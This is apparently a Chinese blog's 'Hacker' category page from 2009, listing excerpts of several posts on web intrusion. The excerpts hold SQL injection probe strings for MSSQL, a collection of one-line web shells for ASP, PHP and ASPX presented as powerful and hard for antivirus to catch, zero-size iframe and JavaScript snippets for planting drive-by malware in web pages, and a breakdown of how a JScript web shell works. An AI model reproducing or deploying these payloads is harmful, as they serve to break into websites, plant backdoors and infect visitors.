摘要:1.判断是否有注入;and1=1;and1=2 2.初步判断是否是mssql;anduser>0 3.注入参数是字符’and[查询条件]and’’=’ 4.搜索时没过滤参数的’and[查询条件]and’%25’=’ 5.判断数据库系统 ;and(selectcount(*)fromsysobjec...
阅读全文
posted @ 2009-05-27 10:57
文章分类 - Hacker
Hacker............
摘要:一句木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。但是正是因为它短小精悍,所以目标特征也很明显,非常容易被杀软等过滤和杀掉,网上目前有些变种,现收集了一些,供收藏。asp一句话<%execute(request("1"))%>php一句话<?php eval($_POST[1]);?>aspx一句话<script language="C#" ...
阅读全文
posted @ 2009-05-15 11:14
摘要:一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 二:js文件挂马 首先将以下代码 document.write("<iframe width='0' height='0' src='地址'></iframe>"); 保存为xxx.js, 则JS挂马代码为 <script language=jav...
阅读全文
posted @ 2009-05-11 12:34
摘要:2009年02月21日 星期六 15:16一句话木马:<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>来解释下它的原理首先<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>是JavaScript脚本的开始标记,其中RUNAT属...
阅读全文
posted @ 2009-05-11 12:31
摘要:当今网络,反病毒软件日益增多,使用的反病毒技术越来越先进,查杀病毒的能力逐渐提高,但病毒制作者并不会罢休,反查杀手段不断升级,新的病毒层出不穷, 形式也越来越多样化,为了躲避查杀,病毒自身的隐蔽性越来越高,针对反病毒软件对传统的病毒传播途径的监控能力提高,造成病毒传播困难的问题,越来越多的 病毒,利用多数反病毒软件产品对恶意脚本监控能力的缺陷,开始利用网页木马这一危害面最广泛,传播效果最佳的方式来...
阅读全文
posted @ 2009-05-11 12:22
浙公网安备 33010602011771号